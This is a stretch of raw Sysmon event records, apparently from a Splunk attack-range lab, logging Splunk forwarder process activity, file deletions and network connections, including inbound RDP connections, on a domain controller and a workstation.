354300x8000000000000000979044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:43.383{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49556-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:46.073{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59F88DE4919FE4345D27F75E2748FFF4,SHA256=E862D7CE228944D744353F21FE01955F7E31C993488EE81BDF9DDFB6B0490D0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.237{5EBD8912-8B0E-6151-3B7A-00000000FC01}9006688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B0E-6151-3B7A-00000000FC01}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8B0E-6151-3B7A-00000000FC01}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.037{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B0E-6151-3B7A-00000000FC01}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.022{5EBD8912-8B0E-6151-3B7A-00000000FC01}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:47.916{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C5D084ABFC2A0A46B201A3C208B51E,SHA256=7DB262C0ED5CE82F354D3952D6B64923DA18AF4CC60935CA517FD4C50A8DC0D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:47.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0384DB0C8E9FE6D76336B43036E99A14,SHA256=4210B56C3A674ED39CC1809214BACE13CC011869B22301A705B4FB7A8E226FD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:47.053{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CAF76A4424976B02D51D2D0E3104DBD,SHA256=A4B2BF367CB9DE4125FBA4B0240DBB8FF115C0589EE64813C3D05836211D081E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:48.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD88345D1F896480D23D26A97EEDF51,SHA256=26E61C7C3D1DBD5850D9CDF5B4CB015F20216F8090DE650D463E8B7F37F747D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:45.103{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53597-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:48.088{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0476B7FD600069F0F0EEDA27D6F88E2,SHA256=F001FFCB1AF1BD807BC4131EF36A99B6041BDF75A0886AEC367FBCB6E6DDBDC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.902{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:49.767{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE710F75E5A2A7918D88423920FB3EAE,SHA256=274B81103DDFF3F5287E0DC36B8FD60C4B88037E4378DE6748B6AFC446E4AF6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:46.824{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59396-false10.0.1.12-8000- 23542300x8000000000000000979049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:49.151{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F807281D1A6C479570370D315CE42FF9,SHA256=995D4093431BE57ADABD57AF64BF8E89F0A35F3BCDDE591FFC56F5E781CD1848,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:49.052{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66A10565973C2A278C9CCE3808F4D43A,SHA256=E0F3C6CCF09F1276C793EB261165A99AF47B4DE5455CE02163944D07792C3231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:50.786{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656F3A9CD9D7AD7535F717404B0B22A1,SHA256=0C6241F98E8D6A724585AC2025D2732BB4BAA90F135BC5B7FE9A7CFF87DBC633,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:47.636{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55210-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:50.713{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=705294F38E518AEEF6E72A6C5837DC95,SHA256=8B89C93300423A82EA352475B49A64D3390734395F2E3112FD7FFF7BBB520668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:50.182{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399469BC9970960AF00D652008F3CDC0,SHA256=284461361AB94EEECA1A5C8D1F2A65EEFC3EB9876FA226C3FBF8273F4C5EE77C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:47.456{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-52724-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:51.804{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=303C4C6D4F8361076E1403F6C8824633,SHA256=087CDBE7E4DD6C0CE33B026B627F2D1A37F0B7F762B14815016397D580361BE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:51.198{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFF8E5A3D288C371817F283512FAF7D8,SHA256=0B6AA49158014E87062BF3FCE4B8EF054EE0519125530763E989A5EDD1E53005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:52.867{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=244E00DA780AAE708FEE435CA89968B3,SHA256=619C51583DC505F028929A7D12243C71D7946E174FDDC7F334A0A43E4B476D6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:52.213{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=477E6BA99E944B5A0A2E9556647EE2F3,SHA256=3A7C589444410FA591046F2DE30A8DE0E0DE1B1D8924F4D36C89E1C038B64D9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.988{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.988{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.988{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.985{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.988{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B15-6151-3C7A-00000000FC01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.985{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B15-6151-3C7A-00000000FC01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.985{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B15-6151-3C7A-00000000FC01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.967{5EBD8912-8B15-6151-3C7A-00000000FC01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:53.867{5EBD8912-7F53-614D-7700-00000000FC01}2312NT 